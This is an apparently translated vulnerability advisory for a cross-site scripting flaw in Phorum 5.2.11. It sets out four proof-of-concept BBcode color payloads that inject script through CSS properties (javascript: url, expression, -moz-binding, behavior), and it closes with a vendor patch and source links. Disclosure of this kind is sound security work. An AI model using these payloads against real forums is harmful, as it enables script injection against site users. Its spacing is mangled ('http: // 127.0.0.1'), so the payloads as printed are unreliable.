Affected Versions:
Phorum 5.2.11
Program introduction:
Phorum is a PHP-based WEB forum program that can be used in Linux and Unix operating systems or Microsoft Windows operating systems.
Vulnerability Analysis:
Phorum's filter engine does not fully validate certain BBcode parameters. Remote attackers can use the vulnerability to inject and execute malicious JavaScript code in the submitted request.
Vulnerability Exploitation:
[Color = #000000; background-image: url (javascript: alert (Sysdream_IE6_Alert);] Sysdream Testing IE6 [/color]
[Color = #000000; xss: expression (alert (Sysdream_IE7_Alert);] Sysdream Testing XSS [/color]
[Color = #000000;-moz-binding: url (http: // 127.0.0.1/phorum/file. php? 0, file = 9, filename = script. xml # mycode);] Sysdream Testing FF [/color]
[Color = #000000; behavior: url (http: // 127.0.0.1/phorum/file. php? 0, file = 8, filename = script. htc);] Sysdream Testing FF [/color]
Solution:
Vendor patch:
Phorum
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.phorum.org/phorum5/read.php? 64, 139411
Information Source:
<* Source: crashfr (crashfr@sysdream.com)
Link:Http://milw0rm.com/exploits/9231
Http://secunia.com/advisories/35928/
*>